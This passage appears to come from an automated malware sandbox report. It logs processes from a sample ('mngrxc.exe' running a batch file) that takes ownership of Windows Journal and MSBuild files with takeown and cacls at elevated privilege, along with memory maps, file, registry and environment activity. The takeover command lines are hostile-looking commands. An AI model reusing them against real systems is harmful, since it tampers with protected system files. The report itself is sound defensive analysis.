| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee40000 | 0x7ee40000 | 0x7ef3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef40000 | 0x7ef40000 | 0x7ef62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef64000 | 0x7ef64000 | 0x7ef64fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef69000 | 0x7ef69000 | 0x7ef6bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef6c000 | 0x7ef6c000 | 0x7ef6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef6f000 | 0x7ef6f000 | 0x7ef6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #177: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #177 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf40 |
| Parent PID | 0xec8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F28
0x
D78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000020000 | 0x00020000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00033fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00041fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00040000 | 0x00044fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00063fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00111fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00120000 | 0x001ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00260000 | 0x00289fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00980000 | 0x00cb6fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f270000 | 0x7f270000 | 0x7f36ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f370000 | 0x7f370000 | 0x7f392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f396000 | 0x7f396000 | 0x7f396fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f398000 | 0x7f398000 | 0x7f398fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39a000 | 0x7f39a000 | 0x7f39cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39d000 | 0x7f39d000 | 0x7f39ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #178: cmd.exe
289
0
| Information | Value |
|---|---|
| ID | #178 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf1c |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F3C
0x
AF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x0496ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004970000 | 0x04970000 | 0x0498ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004970000 | 0x04970000 | 0x0497ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04983fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04991fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04993fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049a0000 | 0x049a0000 | 0x049b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04b03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b10000 | 0x04b10000 | 0x04b10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b30000 | 0x04bedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04f3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04f40000 | 0x05276fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3b0000 | 0x7f3b0000 | 0x7f4affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4b0000 | 0x7f4b0000 | 0x7f4d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f4d6000 | 0x7f4d6000 | 0x7f4d6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4d8000 | 0x7f4d8000 | 0x7f4dafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4db000 | 0x7f4db000 | 0x7f4dbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4dd000 | 0x7f4dd000 | 0x7f4dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (217)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
107 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
11 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 112 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 248, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xfbc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xebc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Workflow.Targets" |
|
1 |
Process #179: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #179 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda4 |
| Parent PID | 0x51c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D98
0x
34C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c30000 | 0x00c30000 | 0x00c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c51fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00c50000 | 0x00c54fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x00c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00db0000 | 0x00dd9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00db0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f00000 | 0x00fbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x05540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005550000 | 0x05550000 | 0x0694ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06950000 | 0x06c86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e130000 | 0x7e130000 | 0x7e22ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e230000 | 0x7e230000 | 0x7e252fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e256000 | 0x7e256000 | 0x7e256fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e258000 | 0x7e258000 | 0x7e25afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e25b000 | 0x7e25b000 | 0x7e25dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e25e000 | 0x7e25e000 | 0x7e25efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
